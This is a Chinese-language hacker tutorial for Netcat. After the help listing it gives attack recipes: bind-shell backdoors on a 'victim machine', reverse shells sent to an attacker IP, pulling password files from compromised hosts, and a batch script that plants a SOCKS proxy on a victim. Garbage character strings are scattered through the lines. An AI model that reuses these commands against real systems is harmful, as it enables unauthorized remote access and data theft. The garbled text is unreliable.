瑞士军刀NC教程
^,KN@ ^,KN@ ^,KN@ 黑客瑞士军刀NC使用教程
^,KN@ ^,KN@ 1. 写在前面的话
^,KN@ ^,KN@ ######################################################################
^,KN@ ^,KN@ NC这个黑客必备的武器,被称为”瑞士军刀”可见功能之强大.
^,KN@ ^,KN@ 对比win2000微软的telnet.exe和微软的tlntsvr.exe服务,连接的时候就可以看出来了.
^,KN@ ^,KN@ 1.1 NC.EXE是一个非标准的telnet客户端程序,
^,KN@ ^,KN@ 1.2 还有一个putty.exe客户端程序,提供四种连接模式
^,KN@ ^,KN@ -raw -telnet -rlogin -ssh.
^,KN@ ^,KN@ 虽然现在也新出了GUI版的中文“NC”,但是相比起来还是这个好用。
^,KN@ ^,KN@ ######################################################################
^,KN@ ^,KN@ 2. Netcat 1.10 for NT 帮助信息
^,KN@ ^,KN@ ######################################################################
^,KN@ ^,KN@ C:\WINDOWS\Desktop>nc -h
^,KN@ ^,KN@ [v1.10 NT]
^,KN@ ^,KN@ connect to somewhere: nc [-options] hostname port[s] [ports] ...
^,KN@ ^,KN@ listen for inbound: nc -l -p port [options] [hostname] [port]
^,KN@ ^,KN@ options:
^,KN@ ^,KN@ -d detach from console, background mode (后台模式)
^,KN@ ^,KN@ -e prog inbound program to exec [dangerous!!]
^,KN@ ^,KN@ -g gateway source-routing hop point[s], up to 8
^,KN@ ^,KN@ -G num source-routing pointer: 4, 8, 12, ...
^,KN@ ^,KN@ -h this cruft (本帮助信息)
^,KN@ ^,KN@ -i secs delay interval for lines sent, ports scanned (延迟时间)
^,KN@ ^,KN@ -l listen mode, for inbound connects (监听模式,等待连接)
^,KN@ ^,KN@ -L listen harder, re-listen on socket close (连接关闭后,仍然继续监听)
^,KN@ ^,KN@ -n numeric-only IP addresses, no DNS (ip数字模式,非dns解析)
^,KN@ ^,KN@ -o file hex dump of traffic (十六进制模式输出文件,三段)
^,KN@ ^,KN@ -p port local port number (本地端口)
^,KN@ ^,KN@ -r randomize local and remote ports (随机本地远程端口)
^,KN@ ^,KN@ -s addr local source address (本地源地址)
^,KN@ ^,KN@ -t answer TELNET negotiation
^,KN@ ^,KN@ -u UDP mode
^,KN@ ^,KN@ -v verbose [use twice to be more verbose] (-vv 更多信息)
^,KN@ ^,KN@ -w secs timeout for connects and final net reads
^,KN@ ^,KN@ -z zero-I/O mode [used for scanning] (扫描模式,-vv)
^,KN@ ^,KN@ port numbers can be individual or ranges: m-n [inclusive]
^,KN@ ######################################################################
^,KN@ ^,KN@ 3. Netcat 1.10 常用的命令格式
^,KN@ ^,KN@ ######################################################################
^,KN@ ^,KN@ 3.1.端口的刺探:
^,KN@ ^,KN@ nc -vv ip port
^,KN@ ^,KN@ RIVER [192.168.0.198] 19190 (?) open //显示是否开放open
^,KN@ ^,KN@ ^,KN@ ^,KN@ 3.2.扫描器
^,KN@ ^,KN@ nc -vv -w 5 ip port-port port
^,KN@ ^,KN@ nc -vv -z ip port-port port
^,KN@ ^,KN@ 这样扫描会留下大量的痕迹,系统管理员会额外小心
^,KN@ RI3{>|* RI3{>|* RI3{>|* 3.3. 后门
RI3{>|* RI3{>|* victim machine: //受害者的机器
RI3{>|* RI3{>|* nc -l -p port -e cmd.exe //win2000
RI3{>|* RI3{>|* nc -l -p port -e /bin/sh //unix,linux
RI3{>|* RI3{>|* attacker machine: //攻击者的机器.
RI3{>|* RI3{>|* nc ip -p port //连接victim_IP,然后得到一个shell。
RI3{>|* RI3{>|* RI3{>|* RI3{>|* 3.4.反向连接
RI3{>|* RI3{>|* attacker machine: //一般是sql2.exe,远程溢出,webdavx3.exe攻击.
RI3{>|* RI3{>|* //或者wollf的反向连接.
RI3{>|* RI3{>|* nc -vv -l -p port
RI3{>|* RI3{>|* victim machine:
RI3{>|* RI3{>|* nc -e cmd.exe attacker ip -p port
RI3{>|* RI3{>|* nc -e /bin/sh attacker ip -p port
RI3{>|* RI3{>|* RI3{>|* RI3{>|* 或者:
RI3{>|* RI3{>|* attacker machine:
RI3{>|* RI3{>|* nc -vv -l -p port1 /*用于输入*/
RI3{>|* RI3{>|* nc -vv -l -p prot2 /*用于显示*/
RI3{>|* RI3{>|* victim machine:
RI3{>|* RI3{>|* nc attacker_ip port1 cmd.exe nc attacker_ip port2
RI3{>|* RI3{>|* nc attacker_ip port1 /bin/sh nc attacker_ip port2
RI3{>|* RI3{>|* RI3{>|* RI3{>|* 139要加参数-s(nc.exe -L -p 139 -d -e cmd.exe -s 对方机器IP)
RI3{>|* RI3{>|* 这样就可以保证nc.exe优先于NETBIOS。
RI3{>|* 3.5.传送文件:
RI3{>|* RI3{>|* 3.5.1 attacker machine <-- victim machine //从肉鸡拖密码文件回来.
RI3{>|* RI3{>|* nc -d -l -p port < path\filedest /*attacker machine*/ 可以shell执行
RI3{>|* RI3{>|* nc -vv attacker_ip port > path\file.txt /*victim machine*/ 需要Ctrl C退出
RI3{>|* RI3{>|* //肉鸡需要gui界面的cmd.exe里面执行(终端登陆,不如安装FTP方便).否则没有办法输入Crl C.
RI3{>|* RI3{>|* RI3{>|* RI3{>|* 3.5.2 attacker machine victim machine //上传命令文件到肉鸡
RI3{>|* RI3{>|* nc -vv -l -p port > path\file.txt /*victim machine*/ 需要Ctrl C退出
RI3{>|* RI3{>|* nc -d victim_ip port < path\filedest /*attacker machine*/ 可以shell执行
RI3{>|* RI3{>|* //这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆.
RI3{>|* RI3{>|* RI3{>|* RI3{>|* 结论: 可以传输ascii,bin文件.可以传输程序文件.
RI3{>|* RI3{>|* RI3{>|* RI3{>|* 问题:连接某个ip后,传送完成后,需要发送Ctrl C退出nc.exe .
RI3{>|* RI3{>|* 或者只有再次连接使用pskill.exe 杀掉进程.但是是否释放传输文件打开的句柄了?
RI3{>|* RI3{>|* RI3{>|* RI3{>|* RI3{>|* RI3{>|* 3.6 端口数据抓包.
RI3{>|* RI3{>|* nc -vv -w 2 -o test.txt
www.hackervip.com 80 21-15
RI3{>|* RI3{>|* RI3{>|* RI3{>|* < 00000058 35 30 30 20 53 79 6e 74 61 78 20 65 72 72 6f 72 # 500 Syntax error
RI3{>|* RI3{>|* < 00000068 2c 20 63 6f 6d 6d 61 6e 64 20 22 22 20 75 6e 72 # , command "" unr
RI3{>|* RI3{>|* < 00000078 65 63 6f 67 6e 69 7a 65 64 2e 0d 0a # ecognized...
RI3{>|* RI3{>|* < 00000084 83 00 00 01 8f # .....
RI3{>|* RI3{>|* RI3{>|* RI3{>|* RI3{>|* RI3{>|* 3.7 telnet,自动批处理。
RI3{>|* RI3{>|* nc victim_ip port < path\file.cmd /*victim machine*/ 显示执行过程.
RI3{>|* RI3{>|* nc -vv victim_ip port < path\file.cmd /*victim machine*/ 显示执行过程.
RI3{>|* RI3{>|* RI3{>|* RI3{>|* nc -d victim_ip port < path\file.cmd 安静模式.
RI3{>|* RI3{>|* RI3{>|* RI3{>|* _______________file.cmd________________________
RI3{>|* RI3{>|* password
RI3{>|* RI3{>|* cd %windir%
RI3{>|* RI3{>|* echo []=[%windir%]
RI3{>|* RI3{>|* c:
RI3{>|* RI3{>|* cd \
RI3{>|* RI3{>|* md test
RI3{>|* RI3{>|* cd /d %windir%\system32\
RI3{>|* RI3{>|* net stop sksockserver
RI3{>|* RI3{>|* snake.exe -config port 11111
RI3{>|* RI3{>|* net start sksockserver
RI3{>|* RI3{>|* exit
RI3{>|* RI3{>|*